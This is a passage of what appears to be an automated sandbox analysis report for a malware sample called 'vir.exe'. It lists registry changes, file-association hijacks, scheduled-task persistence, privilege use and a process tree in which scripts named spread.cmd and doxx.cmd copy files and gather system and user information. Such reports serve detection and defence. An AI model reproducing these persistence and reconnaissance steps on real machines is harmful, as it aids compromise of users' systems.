Explorer\International\Scripts\38\IEPropFontName = "MV Boli" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26\IEPropFontName = "Simsun" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\17\IEFixedFontName = "Tunga" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\3 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\38\IEFixedFontName = "MV Boli" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\21\IEFixedFontName = "Microsoft Himalaya" reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24 reg.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\36 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\9\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEFixedFontName = "Kokila" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\37\IEFixedFontName = "Leelawadee UI" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\7\IEFixedFontName = "Times New Roman" reg.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133682375737707420" rundll32.exe -
Modifies registry class 32 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\\bloatware\\3.exe\" -- \"%1\"" 3.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs goqabvnnwp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\psiphon\ = "URL:psiphon" 3.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\psiphon\shell\open\command 3.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com4 = "7EF9FF8A482882199031D6587DE7BDE5E630583767426346D79C" jaffa.exe Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\psiphon\URL Protocol 3.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat goqabvnnwp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSF\ = "txtfile" goqabvnnwp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.WSH\ = "txtfile" goqabvnnwp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc goqabvnnwp.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\psiphon\shell\open 3.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings OpenWith.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom1 = "E08168C6FE6721A9D27CD1D28A759163" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" goqabvnnwp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsh goqabvnnwp.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\psiphon\shell 3.exe Key created \REGISTRY\MACHINE\Software\Classes\CLV.Classes jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com2 = "6ABFF9BEF965F2E7830E3B4A81EB3E97B38902FB4212033BE1C442ED09A0" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.wsc\ = "txtfile" goqabvnnwp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg goqabvnnwp.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\psiphon 3.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\StartCom2 = "1849C67A1590DBC7B9BC7F97EDE537CC" jaffa.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings jaffa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.wsf goqabvnnwp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" goqabvnnwp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com1 = "33442C779D5783276A3E77D670512CA97CF265D9" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLV.Classes\Com3 = "2EC3B02D4494389952C9BADC32E8D7CB" jaffa.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" goqabvnnwp.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\SystemCertificates\addressbook\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\SystemCertificates\addressbook\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136\Blob = 0300000001000000140000000789b35fd5c2ef8142e6aae3b58fff14e4f13136140000000100000014000000932ca752938ca1308712e92885d692a8c4ba6851200000000100000026050000308205223082040aa00302010202100aa099e64e214d655801ea38ad876711300d06092a864886f70d01010b05003072310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3131302f0603550403132844696769436572742053484132204173737572656420494420436f6465205369676e696e67204341301e170d3230303931303030303030305a170d3233313130323132303030305a305f310b30090603550406130243413110300e060355040813074f6e746172696f3110300e06035504071307546f726f6e746f31153013060355040a130c50736970686f6e20496e632e311530130603550403130c50736970686f6e20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a2903fcbeb078b484066cdac20fed2173f0d1e3651bc3f78c0b89cd9ad1d36ca07291b60264e08bbdc3f3a7c6391a55e806e96d00c6e476d096476aa6e99f841861e81799cb12ddd0f05ab79f7f4aa3796bdf4ce65897824d533fe733c36356c763139392bfa40699af1bd824a97e12ce1375931833eeecff55bec12762ac8cffd6b4c9c89172fb072fa675aac514f67f71069f11bfa82b344e592669db683eddaa655ab68dd38a01537e4616c96b285fa444ec74cd020479fd423765046fdfff218a63f647a2e0a41f1af02341143e26ea3805248675153539361a22022e96acb6f9a8bd1cc46050fc582f6aef5f03515a081d86107e0203e2f3fa403a8cef90203010001a38201c5308201c1301f0603551d230418301680145ac4b97b2a0aa3a5ea7103c060f92df665750e58301d0603551d0e04160414932ca752938ca1308712e92885d692a8c4ba6851300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330770603551d1f0470306e3035a033a031862f687474703a2f2f63726c332e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c3035a033a031862f687474703a2f2f63726c342e64696769636572742e636f6d2f736861322d617373757265642d63732d67312e63726c304c0603551d2004453043303706096086480186fd6c0301302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533008060667810c01040130818406082b0601050507010104783076302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304e06082b060105050730028642687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727453484132417373757265644944436f64655369676e696e6743412e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101005dd2a32986111896351096581a68ca1073d27ac2c6f78d4b371457e616d7e7ee131828e23f0cc54b9e45fb53691a0687abcf4b642eff06628b340dd01e7d3718db0627e143fb1734f965e35857e4994f25c2d60dd92a263a4956cb14c3c105c32631abb2350156b2411fef84ac8125a94e41b6433d3b4e6d6b470e5b84ea91d4cffbf58eb7ad67b77fdc8289b8ca044a4375a32982ef1db8ee7b0067fdf616a9c383a57d67d72affb98b250a35d146be0cffcf248c11aad7c20c67dc1bd7eb5abad226918bf10c58189530408f52107e4c3715ae9ef42d0e88c8948ad2b35e1875841b979e40469d22d2be0df095dfd4be037ae5d46b340c6e8e6fa35f6c4a28 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\SystemCertificates\REQUEST rundll32.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe:ZoneIdentifier notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 20 IoCs
pid Process 6256 PING.EXE 5352 PING.EXE 1388 PING.EXE 6524 PING.EXE 5512 PING.EXE 6432 PING.EXE 5232 PING.EXE 3260 PING.EXE 4412 PING.EXE 6860 PING.EXE 5984 PING.EXE 5772 PING.EXE 7056 PING.EXE 6080 PING.EXE 3988 PING.EXE 5244 PING.EXE 1500 PING.EXE 4124 PING.EXE 3448 PING.EXE 4912 PING.EXE -
Runs regedit.exe 1 IoCs
pid Process 6164 regedit.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 6356 schtasks.exe 5936 schtasks.exe 5384 schtasks.exe 4012 schtasks.exe 1908 schtasks.exe 6516 schtasks.exe 4004 schtasks.exe 4972 schtasks.exe 5580 schtasks.exe 5696 schtasks.exe 6868 schtasks.exe 6008 schtasks.exe 3384 schtasks.exe 6480 schtasks.exe 6764 schtasks.exe 792 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 4 IoCs
pid Process 5160 vlc.exe 4176 WINWORD.EXE 4176 WINWORD.EXE 4412 sjhkhda.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4032 tasklist.exe 4032 tasklist.exe 3904 msedge.exe 3904 msedge.exe 1492 msedge.exe 1492 msedge.exe 5768 msedge.exe 5768 msedge.exe 2240 identity_helper.exe 2240 identity_helper.exe 6936 WinaeroTweaker-1.40.0.0-setup.tmp 6936 WinaeroTweaker-1.40.0.0-setup.tmp 6788 powershell.exe 6788 powershell.exe 6788 powershell.exe 6788 powershell.exe 6788 powershell.exe 6788 powershell.exe 6788 powershell.exe 6788 powershell.exe 6788 powershell.exe 3316 powershell.exe 3316 powershell.exe 3316 powershell.exe 1416 msedge.exe 1416 msedge.exe 6672 msedge.exe 6672 msedge.exe 5608 identity_helper.exe 5608 identity_helper.exe 6104 Umbral.exe 6104 Umbral.exe 768 powershell.exe 768 powershell.exe 768 powershell.exe 6008 powershell.exe 6008 powershell.exe 6008 powershell.exe 6444 powershell.exe 6444 powershell.exe 6444 powershell.exe 4608 powershell.exe 4608 powershell.exe 4608 powershell.exe 5236 powershell.exe 5236 powershell.exe 5236 powershell.exe 6012 msedge.exe 6012 msedge.exe 6532 msedge.exe 6532 msedge.exe 6456 msedge.exe 6456 msedge.exe 7164 msedge.exe 7164 msedge.exe 5084 identity_helper.exe 5084 identity_helper.exe 2220 jkka.exe 2220 jkka.exe 1364 sjhkhda.exe 1364 sjhkhda.exe 4084 jaffa.exe 4084 jaffa.exe 4084 jaffa.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 5160 vlc.exe 6904 !FIXInj.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1364 sjhkhda.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs
pid Process 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 6672 msedge.exe 6672 msedge.exe 6672 msedge.exe 6672 msedge.exe 6672 msedge.exe 6672 msedge.exe 6672 msedge.exe 6672 msedge.exe 6532 msedge.exe 6532 msedge.exe 6532 msedge.exe 6532 msedge.exe 6532 msedge.exe 6532 msedge.exe 6532 msedge.exe 1788 msedge.exe 1788 msedge.exe 1788 msedge.exe 1788 msedge.exe 1788 msedge.exe 1788 msedge.exe 1788 msedge.exe 1788 msedge.exe 1788 msedge.exe 1788 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4032 tasklist.exe Token: SeDebugPrivilege 2216 taskkill.exe Token: SeDebugPrivilege 3376 Rover.exe Token: SeDebugPrivilege 2764 taskkill.exe Token: SeDebugPrivilege 4824 taskkill.exe Token: SeDebugPrivilege 6548 taskkill.exe Token: SeDebugPrivilege 6332 scary.exe Token: SeDebugPrivilege 6508 Romilyaa.exe Token: SeDebugPrivilege 6788 powershell.exe Token: SeDebugPrivilege 6344 Romilyaa.exe Token: SeDebugPrivilege 6632 Romilyaa.exe Token: SeDebugPrivilege 3316 powershell.exe Token: SeDebugPrivilege 4188 Romilyaa.exe Token: SeDebugPrivilege 4428 Romilyaa.exe Token: SeDebugPrivilege 6736 taskkill.exe Token: SeDebugPrivilege 6104 Umbral.exe Token: SeDebugPrivilege 2424 SolaraBootstrapper.exe Token: 33 5040 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 5040 AUDIODG.EXE Token: 33 5160 vlc.exe Token: SeIncBasePriorityPrivilege 5160 vlc.exe Token: SeIncreaseQuotaPrivilege 6296 wmic.exe Token: SeSecurityPrivilege 6296 wmic.exe Token: SeTakeOwnershipPrivilege 6296 wmic.exe Token: SeLoadDriverPrivilege 6296 wmic.exe Token: SeSystemProfilePrivilege 6296 wmic.exe Token: SeSystemtimePrivilege 6296 wmic.exe Token: SeProfSingleProcessPrivilege 6296 wmic.exe Token: SeIncBasePriorityPrivilege 6296 wmic.exe Token: SeCreatePagefilePrivilege 6296 wmic.exe Token: SeBackupPrivilege 6296 wmic.exe Token: SeRestorePrivilege 6296 wmic.exe Token: SeShutdownPrivilege 6296 wmic.exe Token: SeDebugPrivilege 6296 wmic.exe Token: SeSystemEnvironmentPrivilege 6296 wmic.exe Token: SeRemoteShutdownPrivilege 6296 wmic.exe Token: SeUndockPrivilege 6296 wmic.exe Token: SeManageVolumePrivilege 6296 wmic.exe Token: 33 6296 wmic.exe Token: 34 6296 wmic.exe Token: 35 6296 wmic.exe Token: 36 6296 wmic.exe Token: SeIncreaseQuotaPrivilege 6296 wmic.exe Token: SeSecurityPrivilege 6296 wmic.exe Token: SeTakeOwnershipPrivilege 6296 wmic.exe Token: SeLoadDriverPrivilege 6296 wmic.exe Token: SeSystemProfilePrivilege 6296 wmic.exe Token: SeSystemtimePrivilege 6296 wmic.exe Token: SeProfSingleProcessPrivilege 6296 wmic.exe Token: SeIncBasePriorityPrivilege 6296 wmic.exe Token: SeCreatePagefilePrivilege 6296 wmic.exe Token: SeBackupPrivilege 6296 wmic.exe Token: SeRestorePrivilege 6296 wmic.exe Token: SeShutdownPrivilege 6296 wmic.exe Token: SeDebugPrivilege 6296 wmic.exe Token: SeSystemEnvironmentPrivilege 6296 wmic.exe Token: SeRemoteShutdownPrivilege 6296 wmic.exe Token: SeUndockPrivilege 6296 wmic.exe Token: SeManageVolumePrivilege 6296 wmic.exe Token: 33 6296 wmic.exe Token: 34 6296 wmic.exe Token: 35 6296 wmic.exe Token: 36 6296 wmic.exe Token: SeDebugPrivilege 3808 Romilyaa.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 2200 efsui.exe 2200 efsui.exe 2200 efsui.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 6936 WinaeroTweaker-1.40.0.0-setup.tmp 6508 Romilyaa.exe 6344 Romilyaa.exe 6632 Romilyaa.exe 4188 Romilyaa.exe 1492 msedge.exe 4428 Romilyaa.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 6672 msedge.exe 3808 Romilyaa.exe 4888 Romilyaa.exe 6772 Romilyaa.exe 5160 vlc.exe -
Suspicious use of SendNotifyMessage 58 IoCs
pid Process 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 2200 efsui.exe 2200 efsui.exe 2200 efsui.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 1492 msedge.exe 6508 Romilyaa.exe 6344 Romilyaa.exe 6632 Romilyaa.exe 4188 Romilyaa.exe 4428 Romilyaa.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 3808 Romilyaa.exe 4888 Romilyaa.exe 6772 Romilyaa.exe 3528 Romilyaa.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 5132 Romilyaa.exe 6740 f3cb220f1aaa32ca310586e5f62dcab1.exe 6740 f3cb220f1aaa32ca310586e5f62dcab1.exe 6740 f3cb220f1aaa32ca310586e5f62dcab1.exe 2480 Romilyaa.exe 2040 Romilyaa.exe 5424 Romilyaa.exe 4084 jaffa.exe 4084 jaffa.exe 4084 jaffa.exe -
Suspicious use of SetWindowsHookEx 38 IoCs
pid Process 6568 3.exe 6568 3.exe 4188 Romilyaa.exe 4428 Romilyaa.exe 5160 vlc.exe 3448 OpenWith.exe 5460 OpenWith.exe 5160 vlc.exe 5160 vlc.exe 5160 vlc.exe 3808 Romilyaa.exe 3528 Romilyaa.exe 5132 Romilyaa.exe 2480 Romilyaa.exe 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4412 sjhkhda.exe 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE 4176 WINWORD.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4376 wrote to memory of 2620 4376 vir.exe 89 PID 4376 wrote to memory of 2620 4376 vir.exe 89 PID 4376 wrote to memory of 2620 4376 vir.exe 89 PID 4376 wrote to memory of 3624 4376 vir.exe 91 PID 4376 wrote to memory of 3624 4376 vir.exe 91 PID 4376 wrote to memory of 3624 4376 vir.exe 91 PID 3624 wrote to memory of 5048 3624 cmd.exe 94 PID 3624 wrote to memory of 5048 3624 cmd.exe 94 PID 3624 wrote to memory of 5048 3624 cmd.exe 94 PID 3624 wrote to memory of 1696 3624 cmd.exe 96 PID 3624 wrote to memory of 1696 3624 cmd.exe 96 PID 3624 wrote to memory of 1696 3624 cmd.exe 96 PID 3624 wrote to memory of 4912 3624 cmd.exe 98 PID 3624 wrote to memory of 4912 3624 cmd.exe 98 PID 3624 wrote to memory of 4912 3624 cmd.exe 98 PID 5048 wrote to memory of 4496 5048 cmd.exe 99 PID 5048 wrote to memory of 4496 5048 cmd.exe 99 PID 5048 wrote to memory of 4496 5048 cmd.exe 99 PID 1696 wrote to memory of 1480 1696 cmd.exe 100 PID 1696 wrote to memory of 1480 1696 cmd.exe 100 PID 1696 wrote to memory of 1480 1696 cmd.exe 100 PID 5048 wrote to memory of 4360 5048 cmd.exe 101 PID 5048 wrote to memory of 4360 5048 cmd.exe 101 PID 5048 wrote to memory of 4360 5048 cmd.exe 101 PID 1696 wrote to memory of 3468 1696 cmd.exe 102 PID 1696 wrote to memory of 3468 1696 cmd.exe 102 PID 1696 wrote to memory of 3468 1696 cmd.exe 102 PID 5048 wrote to memory of 1388 5048 cmd.exe 103 PID 5048 wrote to memory of 1388 5048 cmd.exe 103 PID 5048 wrote to memory of 1388 5048 cmd.exe 103 PID 3468 wrote to memory of 1512 3468 net.exe 104 PID 3468 wrote to memory of 1512 3468 net.exe 104 PID 3468 wrote to memory of 1512 3468 net.exe 104 PID 1696 wrote to memory of 404 1696 cmd.exe 105 PID 1696 wrote to memory of 404 1696 cmd.exe 105 PID 1696 wrote to memory of 404 1696 cmd.exe 105 PID 404 wrote to memory of 1616 404 net.exe 106 PID 404 wrote to memory of 1616 404 net.exe 106 PID 404 wrote to memory of 1616 404 net.exe 106 PID 1696 wrote to memory of 4032 1696 cmd.exe 107 PID 1696 wrote to memory of 4032 1696 cmd.exe 107 PID 1696 wrote to memory of 4032 1696 cmd.exe 107 PID 3624 wrote to memory of 2216 3624 cmd.exe 110 PID 3624 wrote to memory of 2216 3624 cmd.exe 110 PID 3624 wrote to memory of 2216 3624 cmd.exe 110 PID 3624 wrote to memory of 4740 3624 cmd.exe 111 PID 3624 wrote to memory of 4740 3624 cmd.exe 111 PID 3624 wrote to memory of 4740 3624 cmd.exe 111 PID 3624 wrote to memory of 1492 3624 cmd.exe 113 PID 3624 wrote to memory of 1492 3624 cmd.exe 113 PID 3624 wrote to memory of 1416 3624 cmd.exe 114 PID 3624 wrote to memory of 1416 3624 cmd.exe 114 PID 3624 wrote to memory of 1416 3624 cmd.exe 114 PID 1492 wrote to memory of 4440 1492 msedge.exe 115 PID 1492 wrote to memory of 4440 1492 msedge.exe 115 PID 3624 wrote to memory of 3376 3624 cmd.exe 116 PID 3624 wrote to memory of 3376 3624 cmd.exe 116 PID 3624 wrote to memory of 3376 3624 cmd.exe 116 PID 3624 wrote to memory of 464 3624 cmd.exe 118 PID 3624 wrote to memory of 464 3624 cmd.exe 118 PID 464 wrote to memory of 3556 464 msedge.exe 121 PID 464 wrote to memory of 3556 464 msedge.exe 121 PID 1492 wrote to memory of 3520 1492 msedge.exe 123 PID 1492 wrote to memory of 3520 1492 msedge.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5096 attrib.exe -
outlook_office_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe -
outlook_win_path 1 IoCs
description ioc Process Key queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 sjhkhda.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\vir.exe"C:\Users\Admin\AppData\Local\Temp\vir.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Users\Admin\AppData\Local\Temp\f7c73514-352d-468c-9888-1a95c4f7f6f4\ProgressBarSplash.exe"C:\Users\Admin\AppData\Local\Temp\f7c73514-352d-468c-9888-1a95c4f7f6f4\ProgressBarSplash.exe" -unpacking2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2620
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vir_167ab391-bd5f-4484-9d79-c7cf59cbaf9f\!main.cmd" "2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K spread.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\SysWOW64\xcopy.exexcopy 1 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:4496
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 2 C:\Users\Admin\Desktop4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:4360
-
-
C:\Windows\SysWOW64\xcopy.exexcopy 3 C:\Users\Admin\4⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:1388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K doxx.cmd3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Windows\SysWOW64\ipconfig.exeipconfig4⤵
- Gathers network information
PID:1480
-
-
C:\Windows\SysWOW64\net.exenet accounts4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts5⤵
- System Location Discovery: System Language Discovery
PID:1512
-
-
-
C:\Windows\SysWOW64\net.exenet user4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user5⤵PID:1616
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /apps /v /fo table4⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4032
-
-
-
C:\Windows\SysWOW64\PING.EXEping google.com -t -n 1 -s 4 -43⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4912
-
-
